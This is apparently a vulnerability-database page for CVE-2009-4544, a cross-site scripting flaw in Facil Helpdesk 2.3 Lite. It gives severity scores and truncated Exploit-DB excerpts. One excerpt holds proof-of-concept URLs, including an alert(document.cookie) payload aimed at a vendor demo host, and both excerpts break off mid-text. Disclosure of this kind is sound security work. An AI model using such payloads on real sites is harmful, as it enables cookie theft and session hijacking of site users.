CVE-2009-4544
published 2010-01-04CVE-2009-4544: Cross-site scripting (XSS) vulnerability in kbase/kbase.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to inject arbitrary web…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.55%
72.1th percentile
Cross-site scripting (XSS) vulnerability in kbase/kbase.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cromosoft | facil_helpdesk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting
exploitdb·2009-08-07
CVE-2009-4544 Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting
Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting
---
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities
Discovered By : Moudi
Contact :
Download : http://www.cromosoft.com/en/facilhelpdesk.html
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
*/
[+] Exploit XSS:
- Vulnerable code in kbase.php (/).
- Poc:
http://127.0.0.1/kbase.php/[XSS]
http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/">alert(document.cookie);
[+] Exploit LFI:
- Vulnerable code in index.php (lng).
- Poc:
http://
Exploit-DB
Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting
exploitdb·2009-08-07
CVE-2009-4544 Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting
Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/42528/info
Facil Helpdesk is prone to multiple input-validation vulnerabilities, including a cross-site scripting vulnerability, a local file-include vulnerability, and a remote file-include vulnerability.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, obtain potentially sensitive information, execute local script code in the context of the application, or to execute arbitrary code within the context of the webserver process; other attacks are also possible.
Facil Helpdesk 2.3 Lite is vulnerable; other versions may also be affected.
htt
No writeups or analysis indexed.
2010-01-04
Published